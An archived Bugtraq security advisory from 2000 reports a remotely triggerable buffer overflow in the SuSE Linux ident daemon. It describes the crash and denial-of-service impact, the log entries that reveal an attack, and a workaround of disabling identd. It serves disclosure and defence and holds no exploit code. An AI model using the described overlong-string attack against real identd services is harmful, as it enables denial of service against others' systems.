Bugtraq mailing list archives
SuSE Linux 6.x 7.0 Ident buffer overflow
From: Niels Heinen <niels.heinen () UBIZEN COM>
Date: Tue, 28 Nov 2000 17:20:11 +0100
*************************************************************************** Subject: Ident buffer overflow Platforms: SuSE Linux 6.x 7.0 Risk Level: High Author: Niels Heinen Vendor Status: Notified patches will be available today. *************************************************************************** Impact of the vulnerability: ==================== This advisory details a buffer overflow vulnerability under SuSE Linux that can enable a malicious user to cause Identification Protocol (Ident) handling to crash. Due to the overflow, the system will no longer be able to establish certain connections which use Ident, for example IRC (Internet Relay Chat) connections. If the Ident daemon is not running, users wishing to connect to IRC will not be allowed to make a connection. In the this case the vulnerability could be used in a denial of service attack to keep a person of irc. It's not clear at this present time whether this vulnerability could be exploited in such a way that arbitrary code is executed. If so, this will happen with the privileges of the user "nobody" in a default installation. Who's vulnerable ? ============== This vulnerability has been tested on SuSE version 6.x and version 7.0. Previous versions may also be affected. Further testing will reveal whether other Linux distributions are vulnerable. Technical description: ================ By sending longer than expected strings to the identd port, a remote attacker can crash the daemon. The daemon will also fail to leave any log message given the right length of he string. Seeing the following in the logfile (/var/log/messages) date: suse-machine in.identd[xxx]: s_snprintf(...) = ?: buffer overrun is a clear indication of being attacked by a message length producing log entries. Some other Linux distributions are not vulnerable in the same way, but have to be looked at for suspicious log entries. Another test machine running Red Hat issued here a "Full buffer closing connection" error. Workarounds: =========== If you don't need the Ident, you can keep risk lowest by disabling the ident deamon. This can be done by editing /etc/rc.config. Look for a line like below: START_INDENTD="yes" Change the yes value into no and save the file. After that type as root killall -9 in.identd to stop the ident deamon. More information: ============== Bug finder: Niels Heinen (niels.heinen () ubizen com) Suse web site: http://www.suse.com Suse security email: security () suse com SecurityWatch.com: http://www.securitywatch.com Ident RFC: http://andrew2.andrew.cmu.edu/rfc/rfc1413.html The Disclaimer: ============= *********************************************************************************** All documents and services are provided as is. Ubizen expressly disclaims all warranties, express or implied, including without limitation any implied warranties of merchantability or fitness for a particular purpose, and warranties as to accuracy, completeness or adequacy of information. Ubizen cannot be held accountable for any incorrect or erroneous information. By using the provided documents or services, the user assumes all risks. ***********************************************************************************
Attachment:
smime.p7s
Description: S/MIME Cryptographic Signature
Current thread:
- SuSE Linux 6.x 7.0 Ident buffer overflow Niels Heinen (Nov 29)
- Re: SuSE Linux 6.x 7.0 Ident buffer overflow Roman Drahtmueller (Nov 30)